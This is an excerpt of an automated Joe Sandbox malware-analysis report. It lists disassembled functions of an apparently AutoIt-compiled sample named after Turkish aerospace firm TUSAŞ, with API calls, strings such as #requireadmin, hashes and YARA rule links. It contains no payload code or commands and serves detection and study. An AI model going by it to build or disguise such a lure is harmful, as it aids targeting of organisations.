Instruction Fuzzy Hash: DE31C4392103069FCB10CF28C485EAAB7E9EF55318F258059E8158B3D3DB72DE55CB60

Function 00214653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00214705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00214713
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0021471A

Strings

msctls_updown32, xrefs: 00214684

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 5a3c707e1d7bd1c482e246b77e9d0bb2a86b20f590b7fe69f90f7e9db58cd27b
Instruction ID: 84d2107ec18b2bd02335d823b73239a89724156778ca5924e3bc877b75f51bd1
Opcode Fuzzy Hash: 5a3c707e1d7bd1c482e246b77e9d0bb2a86b20f590b7fe69f90f7e9db58cd27b
Instruction Fuzzy Hash: 262190B5610209AFDB10EF64ECC5DA737EDEF6A794B100049FA049B291CB70EC62CB60

Function 001E95AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 001E961D

Strings

#requireadmin, xrefs: 001E95D9
#OnAutoItStartRegister, xrefs: 001E95F3
#notrayicon, xrefs: 001E95B7

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: 4cf1d8f214c5b21d30dd5039a746e58a512a1eeab8634c763a5a900e8ccf9733
Instruction ID: a4d6cb5c41738e87563e938f653d2a69fe1554131d2a0cf2cd4dbbb578ead35d
Opcode Fuzzy Hash: 4cf1d8f214c5b21d30dd5039a746e58a512a1eeab8634c763a5a900e8ccf9733
Instruction Fuzzy Hash: F1215E7220499066D735BB269C02FBF73D89F7A314F204427F95997081EB51DE92C3D5

Function 002137B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00213840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00213850
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00213876

Strings

Listbox, xrefs: 0021380F

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: f08762a705b1311a31681bea1093138c9d868d579d8bea67ab18899fd1358a18
Instruction ID: 48a3c5f3893a2a2421af07584003976477e59fa22d5e40b0d77b28982ccc50a2
Opcode Fuzzy Hash: f08762a705b1311a31681bea1093138c9d868d579d8bea67ab18899fd1358a18
Instruction Fuzzy Hash: 3D21A1726202197BEF11CF54DC45EEB77AFEF99750F118124F9049B190C6719CA28B90

Function 001F49F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 001F4A08
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 001F4A5C
SetErrorMode.KERNEL32(00000000,?,?,0021CC08), ref: 001F4AD0

Strings

%lu, xrefs: 001F4A6F

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: 7313604977fba54232c760f119e415f40cc5e9c0e0cf8dff4442cccb7706432d
Instruction ID: d2c497112011af128272ca9faee7433d0b58b9defeb24d2d1d5d286cbf200395
Opcode Fuzzy Hash: 7313604977fba54232c760f119e415f40cc5e9c0e0cf8dff4442cccb7706432d
Instruction Fuzzy Hash: BB315175A40109AFDB10DF54C885EAA7BF8EF19308F1480A9F909DB252DB71EE45CBA1

Function 002141EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0021424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00214264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00214271

Strings

msctls_trackbar32, xrefs: 00214226

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 0ceb41d19220c56c3f2038c7dee8a53a543423bfad8ce0374126880057016f1a
Instruction ID: 290675b82310f680618d658efe9b66342022ac60e0f3f28bafe1386d68df0cf2
Opcode Fuzzy Hash: 0ceb41d19220c56c3f2038c7dee8a53a543423bfad8ce0374126880057016f1a
Instruction Fuzzy Hash: C6110631250249BEEF206F28CC06FEB3BECEFA5B54F110124FA59E2090D671DCA19B10

Function 001E2F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00186B57: _wcslen.LIBCMT ref: 00186B6A

Part of subcall function 001E2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 001E2DC5
Part of subcall function 001E2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 001E2DD6
Part of subcall function 001E2DA7: GetCurrentThreadId.KERNEL32 ref: 001E2DDD
Part of subcall function 001E2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 001E2DE4

GetFocus.USER32 ref: 001E2F78

Part of subcall function 001E2DEE: GetParent.USER32(00000000), ref: 001E2DF9

GetClassNameW.USER32(?,?,00000100), ref: 001E2FC3
EnumChildWindows.USER32(?,001E303B), ref: 001E2FEB

Strings

%s%d, xrefs: 001E2FFF

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 00b2c105c0eea7b00d6fb326852287a2d0d07b28f9db24fb6a0eb32a1c39b1a7
Instruction ID: 7b1ac285dd331726b025e40e83eeb751da1e1155092d6d1ca86aa9e5b74cc12c
Opcode Fuzzy Hash: 00b2c105c0eea7b00d6fb326852287a2d0d07b28f9db24fb6a0eb32a1c39b1a7
Instruction Fuzzy Hash: 0211E1B57002456BCF047FB19C99EEE376EAFA4314F048075FA199B292DF309A498B60

Function 00215882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 002158C1
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 002158EE
DrawMenuBar.USER32(?), ref: 002158FD

Strings

0, xrefs: 0021588F

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: a684ce33c87da475f93730278ff6c48ad5a3f4f4e9258a8a31140692ede7ffa7
Instruction ID: 85fce72586280e7396a94891eaf95a43d9eced80a2e9f2f7c603a2116f3ab462
Opcode Fuzzy Hash: a684ce33c87da475f93730278ff6c48ad5a3f4f4e9258a8a31140692ede7ffa7
Instruction Fuzzy Hash: 61015B35510228EFDB219F11EC48BEEBBB9FF95360F208099E849D6151DB708A94DF61

Function 001E007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 894fbd5c5bc3062cc588a9cdda582494a851f29a57a6d636615b0c4c6dd57c1a
Instruction ID: 1d053d54434a5fac0721194ad27a6c7f4737158a4503581f01dd46c449ebdad4
Opcode Fuzzy Hash: 894fbd5c5bc3062cc588a9cdda582494a851f29a57a6d636615b0c4c6dd57c1a
Instruction Fuzzy Hash: 96C17C75A00646EFCB15CFA5C898EAEB7B5FF48304F218598E505EB251C771EE81CB90

Function 0020342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00203459
CoUninitialize.OLE32 ref: 00203463
VariantInit.OLEAUT32(?), ref: 0020346E
VariantClear.OLEAUT32(?), ref: 0020371B

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: 8460717a76985448f6605aff26c4b52d2cf71f3c5f1d1db3e2ada18cd63d6eb1
Instruction ID: a31309442f83fa63791bff7a08dc24e63f17d3fff63dd843dd6e123e99ce780e
Opcode Fuzzy Hash: 8460717a76985448f6605aff26c4b52d2cf71f3c5f1d1db3e2ada18cd63d6eb1
Instruction Fuzzy Hash: 86A14C756147019FC700EF28C485A2ABBE9FF98714F148859F9899B3A2DB31EE01CF91

Function 001E0436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0021FC08,?), ref: 001E05F0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0021FC08,?), ref: 001E0608
CLSIDFromProgID.OLE32(?,?,00000000,0021CC40,000000FF,?,00000000,00000800,00000000,?,0021FC08,?), ref: 001E062D
_memcmp.LIBVCRUNTIME ref: 001E064E

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 686d288262e1dbe27582bff14f0c3a8097dd1a6600d6fa8d59d7b13cece50e72
Instruction ID: 3b003adfd830b4aaf01b7fa977a69f979f09066c170d364344939474f6ef3f6b
Opcode Fuzzy Hash: 686d288262e1dbe27582bff14f0c3a8097dd1a6600d6fa8d59d7b13cece50e72
Instruction Fuzzy Hash: 04814975A00609EFCB05DF94C988EEEB7B9FF89315F204158E506AB250DB71AE46CF60

Function 001C1391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 001C14C0

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 2da0a3d659b4cfda5586796b6c747cacddf69574ee4e2148415c7bfd8251e00a
Instruction ID: 8a5d46db44a1a387a5d35b03a1e6ccce4877815901ef7f927bdd4c53255f50f4
Opcode Fuzzy Hash: 2da0a3d659b4cfda5586796b6c747cacddf69574ee4e2148415c7bfd8251e00a
Instruction Fuzzy Hash: 2A413A35980500BBDB296BF99C46FBE3AA5EF73370F24466DF419D2293E734C8425261

Function 00216278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(0171E7D0,?), ref: 002162E2
ScreenToClient.USER32(?,?), ref: 00216315
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00216382

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 694ffa069282980bf93ec604c053672d6af283e0b919452dfcca9752ad0efcb2
Instruction ID: acb391de7722d22080a6fd281f1cf26cec0701177adc439b9baae35fa7a3c4ba
Opcode Fuzzy Hash: 694ffa069282980bf93ec604c053672d6af283e0b919452dfcca9752ad0efcb2
Instruction Fuzzy Hash: 5D513C74A1020AAFCB14DF54D888AEE7BF5EF65760F208199F82597290D770EDA1CB50

Function 00201AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00201AFD
WSAGetLastError.WSOCK32 ref: 00201B0B
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00201B8A
WSAGetLastError.WSOCK32 ref: 00201B94

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: b440b2e3aaea06d23ccadae8bcd2f3fd37c01847a16828c2e9094102e0b33f39
Instruction ID: 94a12abc1d40389d3b3472177d108db5a6b530b7c3b4953587e08b3ad66ced5d
Opcode Fuzzy Hash: b440b2e3aaea06d23ccadae8bcd2f3fd37c01847a16828c2e9094102e0b33f39
Instruction Fuzzy Hash: D641B034640300AFE720AF24D88AF2977E5AB54718F548488FA1A9F7D3D772DD528B90

Function 001BB41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc9c65cdf04e54399cc17d791a19767e8132870c44c2a297e182f4e1279d4e6b
Instruction ID: 7d30fca46fd0aba15cab37c011c523381e55ecc2db23b315b116c6c3715c46c1
Opcode Fuzzy Hash: cc9c65cdf04e54399cc17d791a19767e8132870c44c2a297e182f4e1279d4e6b
Instruction Fuzzy Hash: E0412976A04704BFD724AF78CC81BEABBE9EB99710F10452EF142DB682D7B1D9018780

Function 001F56D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 001F5783
GetLastError.KERNEL32(?,00000000), ref: 001F57A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 001F57CE
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 001F57FA

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 9f3e478d2cbe2a830c138e64ee48706153cd51caf4ef88c34bdfa6e56d398adb
Instruction ID: 032c59a9c1405b641d07749a976302c9503f6abd3693a7e326b84ae7a0fd0e5a
Opcode Fuzzy Hash: 9f3e478d2cbe2a830c138e64ee48706153cd51caf4ef88c34bdfa6e56d398adb
Instruction Fuzzy Hash: EB410B39600A14DFCB11EF15D544A5EBBE2AF99720B19C488E95AAB362CB34FD40CF91

Function 001BD8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,001A6D71,00000000,00000000,001A82D9,?,001A82D9,?,00000001,001A6D71,8BE85006,00000001,001A82D9,001A82D9), ref: 001BD910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 001BD999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 001BD9AB
__freea.LIBCMT ref: 001BD9B4

Part of subcall function 001B3820: RtlAllocateHeap.NTDLL(00000000,?,00251444,?,0019FDF5,?,?,0018A976,00000010,00251440,001813FC,?,001813C6,?,00181129), ref: 001B3852

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 2082b86b6fd4bbe31c3ed69addad6742f5835b9cb045f8f32e1cdbabf73252a8
Instruction ID: d26abbc9556fab4853f4ef070e0ea287504da05dadc1e2cd46fc08a4adf433b0
Opcode Fuzzy Hash: 2082b86b6fd4bbe31c3ed69addad6742f5835b9cb045f8f32e1cdbabf73252a8
Instruction Fuzzy Hash: 8231BC72A0020AABDF299F64EC85EEE7BA5EB51314F154268FC04D7250EB35CD50CBA0

Function 002152C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 00215352
GetWindowLongW.USER32(?,000000F0), ref: 00215375
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00215382
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002153A8

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: 5dc527f7d41c2fcdcb12ed7fd5afa1f4704c7f66df0b1560332afbd01160cd97
Instruction ID: f4dc017a660a9eabb4314245abe4f0bc5aaa60acfa5a77cb1719cfdd847e7388
Opcode Fuzzy Hash: 5dc527f7d41c2fcdcb12ed7fd5afa1f4704c7f66df0b1560332afbd01160cd97
Instruction Fuzzy Hash: F331E634A75A29EFEB349E14DC05BE837E5ABA4390F5441C2FA20971E0C7F49DE0AB41

Function 001EAB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 001EABF1
SetKeyboardState.USER32(00000080,?,00008000), ref: 001EAC0D
